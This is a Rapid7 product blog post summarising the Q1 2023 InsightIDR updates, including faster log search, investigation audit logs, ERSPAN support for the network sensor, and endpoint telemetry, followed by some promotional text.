Last updated at Wed, 03 May 2023 12:59:01 GMT
InsightIDR received a number of exciting updates in Q1 2023, including faster search, a redesigned UI, updated investigations, support for Insight Network Sensor, Enhanced Endpoint Telemetry, and more.
In our effort to empower practitioners to feel confident in their detection and response capabilities, we focused on functionality that accelerates investigation and response time. Below you will find key launches and enhancements from the last three months.
Augmented Practitioner Log Search Experience: Faster Search Capabilities & Redesigned UI
Equipped with new features and better interactivity for a more seamless user experience, the new Log Search provides teams the ability to load selected log sets 3x faster in addition to providing:
- Easy share and analysis of Log Search queries.
- Customization of log data in Table View, JSON Format, and Condensed Format.
Learn more about the improved Log Search here.
Increased Visibility, More Coverage with Updated Investigations Functionality
InsightIDR now provides more visibility into actions taken during an investigation. The investigation audit log records updates made in the investigation, when those updates were made, and the user who made them. Additional features include visibility in Log Search as a part of the Audit Logs log set.
To learn more about Viewing the Audit Log click here.
Additionally, two new options are added in Investigations to help practitioners more accurately describe an investigation’s current state - waiting status and unknown disposition. Teams can:
- Use the Waiting status to indicate that the investigation is in a pending state while more information is gathered.
- Use the Unknown disposition to indicate that the maliciousness of the investigation couldn’t be determined.
Understand Traffic data via VLANs or Ports with ERSPAN Support for Insight Network Sensor
Security teams can now use Encapsulated Remote SPAN (ERSPAN) with the Insight Network
Sensor to mirror traffic associated with one or more VLANs or ports. When configured, a switch will send the SPAN traffic to a Sensor over IP. This allows teams to deploy a Sensor on whatever platform they want and get a copy of network traffic from a crucial network location such as a core switch. Practitioners can enable ERSPAN on a per Sensor basis from the Sensor Management page.
Enriched Endpoint Response with Enhanced Endpoint Telemetry (EET) Data
InsightIDR customers can now leverage EET (captured by the Insight Agent) and capture endpoint process start metadata to create custom detections, accelerate investigations, and help respond with greater precision. InsightIDR Advanced customers have access to a 7 day view; while InsightIDR Ultimate customers have a 13 month view.
Learn more about the Enhanced Endpoint Telemetry release here.
Stay tuned!
Rapid7 provides organizations the world’s only, practitioner-first security solutions. Each product, including InsightIDR, is purpose-built by practitioners, for practitioners to ensure teams achieve elevated outcomes without compromise.
We’re always working on new product enhancements and functionality to ensure teams can stay ahead of potential threats and malicious activity. Keep an eye on the Rapid7 blog and the InsightIDR release notes to keep up to date with the latest detection and response releases at Rapid7.